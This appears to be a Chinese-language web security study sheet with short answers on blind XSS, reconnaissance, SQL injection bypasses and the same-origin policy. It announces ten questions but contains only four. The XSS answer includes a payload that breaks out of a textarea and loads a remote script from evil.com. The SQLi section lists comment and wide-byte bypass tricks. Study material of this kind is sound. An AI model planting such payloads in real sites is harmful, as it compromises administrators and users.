描述
一共十道简答题。
1.XSS盲打
什么是XSS盲打,给出一个payload案例。
解析
在“用户留言,意见反馈,联系客服,提交简历”等位置构造XSS,通常为存储型XSS。
因为恶意攻击者提交payload之后,无法马上判断攻击是否成功(如果漏洞确实存在,还需要后台管理员阅读到相关信息),因此称之为盲打。
有时候需要用textarea闭合标签,也有时候不需要。比如在”姓名”处的盲打通常不需要,而在一些多行输入的位置通常需要先闭合 textarea.
举个payload的例子1</textarea><script src="http://evil.com/evil.js"></script><textarea>
2.信息收集
- 域名与二级域名
- 各域名相关IP
- 各IP对应主机的端口开放情况
- 各IP对应主机的 Nmap 操作系统指纹
- 邮件系统 能否使用伪造邮箱攻击
- whois信息
- robots.txt
- crossdomain.xml
- 是否使用CDN
- 是否使用WAF
- 查看招聘网站了解技术栈
- 查看 HTTP 响应 确定 服务器版本(Nginx or Apache?)与技术架构(ASP or PHP?)
- Wapplyzer
- 查看github观察是否有源码泄漏
3. SQLi
常见绕过方式
- cookie
- Mysql注释
/**/
,%20--%20
- 宽字节注入
4. 同源协议
三要素
域名
协议
端口